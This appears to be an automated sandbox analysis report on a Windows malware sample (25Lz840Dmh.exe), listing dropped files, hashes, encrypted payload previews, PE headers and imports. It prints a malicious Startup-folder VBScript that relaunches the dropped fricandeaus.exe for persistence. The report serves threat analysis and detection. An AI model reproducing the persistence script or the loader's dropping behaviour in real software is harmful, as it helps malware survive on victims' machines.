                                                Size (bytes):11014
                                                Entropy (8bit):7.475114923747301
                                                Encrypted:false
                                                SSDEEP:192:4bF9LYUdWsxmCXGOqRtSPHMrWDKaB6m02bkgrNAhijaHvu3h3Y:4bF9LQsX1PsTa/kbGp3ho
                                                MD5:94607DCF1DCEE63983D98EF6CA8682EF
                                                SHA1:0EF13AC203B5F2368C5DEA48BBB4BE458A05D3DD
                                                SHA-256:EF86BAB30ECD03073A26D7950B278C2720A54FFCB5B019B6B935EC634B6DB727
                                                SHA-512:F7CF2EC7B652464BC7CC0C7C9224A06098A400FE8E1B1E758FD8291C0266F97E04F02668D91319C004C7A4A7B7F0DBDDEE382A6AED0CB1EF866A006CB03DBA3B
                                                Malicious:false
                                                Preview:EA06..t.......V;...8....[4.p. ..0...=........f.M@.......X...,..8....t..Mf.[..c2.N&3)..$."..l...M.I..a2....@.......,.`.v.f..E.9...,.@......S.i..cf..@.@..gd...h.q...}.P....9...x......r..Y..."cb.#&........f.4.Yl.`..Yf..`.d.....r...$..&..i....>g.[..d..L.X:.9....e.v.....k0.L.....o0.u&....j...'....O&sy...f...T.0..Yrd....Jb.....e5.L&.0..`..s0......Y3.!...2....f..p.... ...d.....k3.R....-.Qd....`.......m1.`.& ....0..R_..se...@......T..m1.M.....U.k4...... .v.. ...m2.>@.......X.......%......0.............f..^......I.=..g......%..J........C...B....$L..4..c3.M..>)...4. l.Y....A.!.....f..@.....p.@.l.i..n.A.X@.....4..@ >....5..g......e. f.[,.ee. .&s.$....PR....N.=.OP.|.....-.m0.x...4..,.p....M&.i..)1...[,....M,`.....b..<.).ae...2........AZ..8LlVI....'Y@.k $.....fr.....g7.d'.0Q..Z.K......5....._.._@y...........&@.~..&.0.D.#.Gz..f.P....@.)...f y...,s....d...D....-d.C......s./..Yd.....%.5....0..Yf...)...,fa0..x.k4..k.Y..$........Nf..<......].l`..0.W.5..(..u....#../.b....@..e.........

                                                C:\Users\user\AppData\Local\Temp\autE43B.tmp

                                                Download File
                                                Process:C:\Users\user\Desktop\25Lz840Dmh.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):287744
                                                Entropy (8bit):7.993818112232754
                                                Encrypted:true
                                                SSDEEP:6144:5l22Aa7iW5+WkdzGx+sG07RZjrvYtlVVjmVfWL:G2Aa71JkYx+sLlZQjVNL
                                                MD5:FB7D14D5A2FB2B6861ACB237BEA1680A
                                                SHA1:72DC783F910CDB89EDF7814C6DB7F69576D8E1D2
                                                SHA-256:7060C65B49B404945B8157B61AB821A26819F5B496F1D375FA57802B810EE29F
                                                SHA-512:EDCD2C44C353FE4350DE05463B10D2410AFC783E3F2AD63139CCF5C94B8F3C617B78609C815758EB679320A18A4E3EECF7B44A57EEB849CF3CD2F2E3F4EBB92D
                                                Malicious:false
                                                Preview:.b|d.UA2S...<.....UB...W=...964UA2SM5T5LK8964UA2SM5T5LK896.UA2]R.Z5.B...5....%\'.<9W^DU8aQ2#[;Al)].DA;a[=mq.fl&W]S.XL8wM5T5LK8@7=.|R4..4R.vX^.....i-R./....VS.[....4R..QZ^.5&.SM5T5LK8is4U.3RMq...K8964UA2.M7U>M@89d0UA2SM5T5L.,964EA2S=1T5L.89&4UA0SM3T5LK8962UA2SM5T5<O8944UA2SM7Tu.K8)64EA2SM%T5\K8964UQ2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T.8.@M64U.bWM5D5LKj=64EA2SM5T5LK8964Ua2S-5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964U

                                                C:\Users\user\AppData\Local\Temp\autE47A.tmp

                                                Download File
                                                Process:C:\Users\user\Desktop\25Lz840Dmh.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):11014
                                                Entropy (8bit):7.475114923747301
                                                Encrypted:false
                                                SSDEEP:192:4bF9LYUdWsxmCXGOqRtSPHMrWDKaB6m02bkgrNAhijaHvu3h3Y:4bF9LQsX1PsTa/kbGp3ho
                                                MD5:94607DCF1DCEE63983D98EF6CA8682EF
                                                SHA1:0EF13AC203B5F2368C5DEA48BBB4BE458A05D3DD
                                                SHA-256:EF86BAB30ECD03073A26D7950B278C2720A54FFCB5B019B6B935EC634B6DB727
                                                SHA-512:F7CF2EC7B652464BC7CC0C7C9224A06098A400FE8E1B1E758FD8291C0266F97E04F02668D91319C004C7A4A7B7F0DBDDEE382A6AED0CB1EF866A006CB03DBA3B
                                                Malicious:false
                                                Preview:EA06..t.......V;...8....[4.p. ..0...=........f.M@.......X...,..8....t..Mf.[..c2.N&3)..$."..l...M.I..a2....@.......,.`.v.f..E.9...,.@......S.i..cf..@.@..gd...h.q...}.P....9...x......r..Y..."cb.#&........f.4.Yl.`..Yf..`.d.....r...$..&..i....>g.[..d..L.X:.9....e.v.....k0.L.....o0.u&....j...'....O&sy...f...T.0..Yrd....Jb.....e5.L&.0..`..s0......Y3.!...2....f..p.... ...d.....k3.R....-.Qd....`.......m1.`.& ....0..R_..se...@......T..m1.M.....U.k4...... .v.. ...m2.>@.......X.......%......0.............f..^......I.=..g......%..J........C...B....$L..4..c3.M..>)...4. l.Y....A.!.....f..@.....p.@.l.i..n.A.X@.....4..@ >....5..g......e. f.[,.ee. .&s.$....PR....N.=.OP.|.....-.m0.x...4..,.p....M&.i..)1...[,....M,`.....b..<.).ae...2........AZ..8LlVI....'Y@.k $.....fr.....g7.d'.0Q..Z.K......5....._.._@y...........&@.~..&.0.D.#.Gz..f.P....@.)...f y...,s....d...D....-d.C......s./..Yd.....%.5....0..Yf...)...,fa0..x.k4..k.Y..$........Nf..<......].l`..0.W.5..(..u....#../.b....@..e.........

                                                C:\Users\user\AppData\Local\Temp\autEB20.tmp

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):287744
                                                Entropy (8bit):7.993818112232754
                                                Encrypted:true
                                                SSDEEP:6144:5l22Aa7iW5+WkdzGx+sG07RZjrvYtlVVjmVfWL:G2Aa71JkYx+sLlZQjVNL
                                                MD5:FB7D14D5A2FB2B6861ACB237BEA1680A
                                                SHA1:72DC783F910CDB89EDF7814C6DB7F69576D8E1D2
                                                SHA-256:7060C65B49B404945B8157B61AB821A26819F5B496F1D375FA57802B810EE29F
                                                SHA-512:EDCD2C44C353FE4350DE05463B10D2410AFC783E3F2AD63139CCF5C94B8F3C617B78609C815758EB679320A18A4E3EECF7B44A57EEB849CF3CD2F2E3F4EBB92D
                                                Malicious:false
                                                Preview:.b|d.UA2S...<.....UB...W=...964UA2SM5T5LK8964UA2SM5T5LK896.UA2]R.Z5.B...5....%\'.<9W^DU8aQ2#[;Al)].DA;a[=mq.fl&W]S.XL8wM5T5LK8@7=.|R4..4R.vX^.....i-R./....VS.[....4R..QZ^.5&.SM5T5LK8is4U.3RMq...K8964UA2.M7U>M@89d0UA2SM5T5L.,964EA2S=1T5L.89&4UA0SM3T5LK8962UA2SM5T5<O8944UA2SM7Tu.K8)64EA2SM%T5\K8964UQ2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T.8.@M64U.bWM5D5LKj=64EA2SM5T5LK8964Ua2S-5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964U

                                                C:\Users\user\AppData\Local\Temp\autEC1B.tmp

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):11014
                                                Entropy (8bit):7.475114923747301
                                                Encrypted:false
                                                SSDEEP:192:4bF9LYUdWsxmCXGOqRtSPHMrWDKaB6m02bkgrNAhijaHvu3h3Y:4bF9LQsX1PsTa/kbGp3ho
                                                MD5:94607DCF1DCEE63983D98EF6CA8682EF
                                                SHA1:0EF13AC203B5F2368C5DEA48BBB4BE458A05D3DD
                                                SHA-256:EF86BAB30ECD03073A26D7950B278C2720A54FFCB5B019B6B935EC634B6DB727
                                                SHA-512:F7CF2EC7B652464BC7CC0C7C9224A06098A400FE8E1B1E758FD8291C0266F97E04F02668D91319C004C7A4A7B7F0DBDDEE382A6AED0CB1EF866A006CB03DBA3B
                                                Malicious:false
                                                Preview:EA06..t.......V;...8....[4.p. ..0...=........f.M@.......X...,..8....t..Mf.[..c2.N&3)..$."..l...M.I..a2....@.......,.`.v.f..E.9...,.@......S.i..cf..@.@..gd...h.q...}.P....9...x......r..Y..."cb.#&........f.4.Yl.`..Yf..`.d.....r...$..&..i....>g.[..d..L.X:.9....e.v.....k0.L.....o0.u&....j...'....O&sy...f...T.0..Yrd....Jb.....e5.L&.0..`..s0......Y3.!...2....f..p.... ...d.....k3.R....-.Qd....`.......m1.`.& ....0..R_..se...@......T..m1.M.....U.k4...... .v.. ...m2.>@.......X.......%......0.............f..^......I.=..g......%..J........C...B....$L..4..c3.M..>)...4. l.Y....A.!.....f..@.....p.@.l.i..n.A.X@.....4..@ >....5..g......e. f.[,.ee. .&s.$....PR....N.=.OP.|.....-.m0.x...4..,.p....M&.i..)1...[,....M,`.....b..<.).ae...2........AZ..8LlVI....'Y@.k $.....fr.....g7.d'.0Q..Z.K......5....._.._@y...........&@.~..&.0.D.#.Gz..f.P....@.)...f y...,s....d...D....-d.C......s./..Yd.....%.5....0..Yf...)...,fa0..x.k4..k.Y..$........Nf..<......].l`..0.W.5..(..u....#../.b....@..e.........

                                                C:\Users\user\AppData\Local\Temp\directiveness

                                                Download File
                                                Process:C:\Users\user\Desktop\25Lz840Dmh.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):287744
                                                Entropy (8bit):7.993818112232754
                                                Encrypted:true
                                                SSDEEP:6144:5l22Aa7iW5+WkdzGx+sG07RZjrvYtlVVjmVfWL:G2Aa71JkYx+sLlZQjVNL
                                                MD5:FB7D14D5A2FB2B6861ACB237BEA1680A
                                                SHA1:72DC783F910CDB89EDF7814C6DB7F69576D8E1D2
                                                SHA-256:7060C65B49B404945B8157B61AB821A26819F5B496F1D375FA57802B810EE29F
                                                SHA-512:EDCD2C44C353FE4350DE05463B10D2410AFC783E3F2AD63139CCF5C94B8F3C617B78609C815758EB679320A18A4E3EECF7B44A57EEB849CF3CD2F2E3F4EBB92D
                                                Malicious:false
                                                Preview:.b|d.UA2S...<.....UB...W=...964UA2SM5T5LK8964UA2SM5T5LK896.UA2]R.Z5.B...5....%\'.<9W^DU8aQ2#[;Al)].DA;a[=mq.fl&W]S.XL8wM5T5LK8@7=.|R4..4R.vX^.....i-R./....VS.[....4R..QZ^.5&.SM5T5LK8is4U.3RMq...K8964UA2.M7U>M@89d0UA2SM5T5L.,964EA2S=1T5L.89&4UA0SM3T5LK8962UA2SM5T5<O8944UA2SM7Tu.K8)64EA2SM%T5\K8964UQ2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T.8.@M64U.bWM5D5LKj=64EA2SM5T5LK8964Ua2S-5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964U

                                                C:\Users\user\AppData\Local\Temp\vaccinators

                                                Download File
                                                Process:C:\Users\user\Desktop\25Lz840Dmh.exe
                                                File Type:ASCII text, with very long lines (29698), with no line terminators
                                                Category:modified
                                                Size (bytes):29698
                                                Entropy (8bit):3.535048592449354
                                                Encrypted:false
                                                SSDEEP:384:cdhx4G/Yxkn3vnSWuiCnF8fNfwdvT/gcvR21W486yRv6Itdps8MpIZbQF1aFNjPF:ZG/4k3vA/FYYdvzgcp4W6Itdph8F8/1H
                                                MD5:CC90C7B76241E3C46718FDF4B998C9DA
                                                SHA1:011AA6B45312C833D2F6B8BE0295F3E339C4F4B0
                                                SHA-256:F098273F5E95E608CF58181CE955F2FCF1D59C0C21C9178A9748B2E48B62B615
                                                SHA-512:9E73C36C589E6C60A0CBE69506FA989D71B330236CC66A7015FC8643F7974493F29D0E61C83AECD02B6FB6F1C66A7643F80FD551C97B3CF4A26F40D7A967DDB5
                                                Malicious:false
                                                Preview:0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000cc5e8c30ef480000f4c0ef48f4807c800089ff65f482700008b80e8e85ccccccccc00c555af124812781278555ccccccccccc00cf74408025802480258cccccccccc00c5e8dff48fff5ef480c8f48f48d430ecf48d48c3f521fc1ecf58c3d421fc1ecf48c3d521fc1ecf58c3d421fc1ecf48c3e521fc1ecf58c3e421fc1ecf48c3e521fc1ecf58e421fc1ecf48f48f43f480009800f78f581b0f40048fffff4c0000f4ce48edf430ecf48e58f530ecf58e480ecf48e480ecf48d580ecf58d480ecf48d48edf48eb82f4c3e8e85cccccc00c5e8c3be0e800048e5850b0e48f58170430002e5e48e48800048e58f4837143f48f58f480c8f480e

                                                C:\Users\user\AppData\Local\Temp\w2-0G0-7

                                                Download File
                                                Process:C:\Windows\SysWOW64\mobsync.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                Category:modified
                                                Size (bytes):196608
                                                Entropy (8bit):1.1215420383712111
                                                Encrypted:false
                                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):288
                                                Entropy (8bit):3.457128496333936
                                                Encrypted:false
                                                SSDEEP:6:DMM8lfm3OOQdUfclMMlW8g1UEZ+lX1Mf7eAlDi7nriIM8lfQVn:DsO+vNlMkXg1Q1ESAh2mA2n
                                                MD5:BDCEE1825095500243F0C12802690DD8
                                                SHA1:39C7D445DAE72AF3D8D0EB3B2EE7219CD6A87DA5
                                                SHA-256:2603680D948357D1BA7E9BE1C3730800F879830A6BCB585F23D1A57A95BDF04D
                                                SHA-512:A64282D90A757163EC534C3371810F5DBF3C51993E1209D0B7BF3CC1C9BB21E40145ADF4806EB5DB5A4842B4E961A0130928390746C5BDFA8DEE6AC14E4FA0F3
                                                Malicious:true
                                                Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.D.a.l.y.m.o.r.e.\.f.r.i.c.a.n.d.e.a.u.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.147712317212054
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:25Lz840Dmh.exe
                                                File size:1'169'920 bytes
                                                MD5:6c35b069b37095a1788e5c7b51a60e97
                                                SHA1:3b36ef6c51bb8094729bae419675a2aa21bc6d23
                                                SHA256:232aba52f171fefbb08cdf88d9fafc571394cf8ec159081d5f9cad2ea2f7669c
                                                SHA512:06e30105a7cefd397d1c436c9eec0d477fe505475054cb8e2d8e977e6959fa600dbdc6895c76bbda330af742bec54f0eed477faa40b869dda45e41f183c23854
                                                SSDEEP:24576:Wu6J33O0c+JY5UZ+XC0kGso6Fa+bh6PgHDpASu6iBf/1RvYB+WY:4u0c++OCvkGs9Fa+b3DSZ6wf/1AY
                                                TLSH:0B45CF2273DEC360CB769273BF69B7016EBF78614630B85B2F880D79A950171162D7A3
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                File Icon

                                                Icon Hash:aaf3e3e3938382a0

                                                Static PE Info

                                                General

                                                Entrypoint:0x427dcd
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x675A767D [Thu Dec 12 05:37:01 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:1
                                                File Version Major:5
                                                File Version Minor:1
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:1
                                                Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                Entrypoint Preview

                                                Instruction
                                                call 00007F4508EA804Ah
                                                jmp 00007F4508E9AE14h
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                push edi
                                                push esi
                                                mov esi, dword ptr [esp+10h]
                                                mov ecx, dword ptr [esp+14h]
                                                mov edi, dword ptr [esp+0Ch]
                                                mov eax, ecx
                                                mov edx, ecx
                                                add eax, esi
                                                cmp edi, esi
                                                jbe 00007F4508E9AF9Ah
                                                cmp edi, eax
                                                jc 00007F4508E9B2FEh
                                                bt dword ptr [004C31FCh], 01h
                                                jnc 00007F4508E9AF99h
                                                rep movsb
                                                jmp 00007F4508E9B2ACh
                                                cmp ecx, 00000080h
                                                jc 00007F4508E9B164h
                                                mov eax, edi
                                                xor eax, esi
                                                test eax, 0000000Fh
                                                jne 00007F4508E9AFA0h
                                                bt dword ptr [004BE324h], 01h
                                                jc 00007F4508E9B470h
                                                bt dword ptr [004C31FCh], 00000000h
                                                jnc 00007F4508E9B13Dh
                                                test edi, 00000003h
                                                jne 00007F4508E9B14Eh
                                                test esi, 00000003h
                                                jne 00007F4508E9B12Dh
                                                bt edi, 02h
                                                jnc 00007F4508E9AF9Fh
                                                mov eax, dword ptr [esi]
                                                sub ecx, 04h
                                                lea esi, dword ptr [esi+04h]
                                                mov dword ptr [edi], eax
                                                lea edi, dword ptr [edi+04h]
                                                bt edi, 03h
                                                jnc 00007F4508E9AFA3h
                                                movq xmm1, qword ptr [esi]
                                                sub ecx, 08h
                                                lea esi, dword ptr [esi+08h]
                                                movq qword ptr [edi], xmm1
                                                lea edi, dword ptr [edi+08h]
                                                test esi, 00000007h
                                                je 00007F4508E9AFF5h
                                                bt esi, 03h
                                                jnc 00007F4508E9B048h

                                                Rich Headers

                                                Programming Language:
                                                • [ASM] VS2013 build 21005
                                                • [ C ] VS2013 build 21005
                                                • [C++] VS2013 build 21005
                                                • [ C ] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729
                                                • [ASM] VS2013 UPD4 build 31101
                                                • [RES] VS2013 build 21005
                                                • [LNK] VS2013 UPD4 build 31101

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5514c.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x11d0000x711c.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0xc70000x5514c0x5520087cb67ba824ceae4f28f23cfecd662e7False0.9229304331864905data7.882509985996072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x11d0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                RT_RCDATA0xcf7b80x4c414data1.0003393737593649
                                                RT_GROUP_ICON0x11bbcc0x76dataEnglishGreat Britain0.6610169491525424
                                                RT_GROUP_ICON0x11bc440x14dataEnglishGreat Britain1.25
                                                RT_GROUP_ICON0x11bc580x14dataEnglishGreat Britain1.15
                                                RT_GROUP_ICON0x11bc6c0x14dataEnglishGreat Britain1.25
                                                RT_VERSION0x11bc800xdcdataEnglishGreat Britain0.6181818181818182
                                                RT_MANIFEST0x11bd5c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                Imports

                                                DLLImport
                                                WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                PSAPI.DLLGetProcessMemoryInfo
                                                IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                UxTheme.dllIsThemeActive
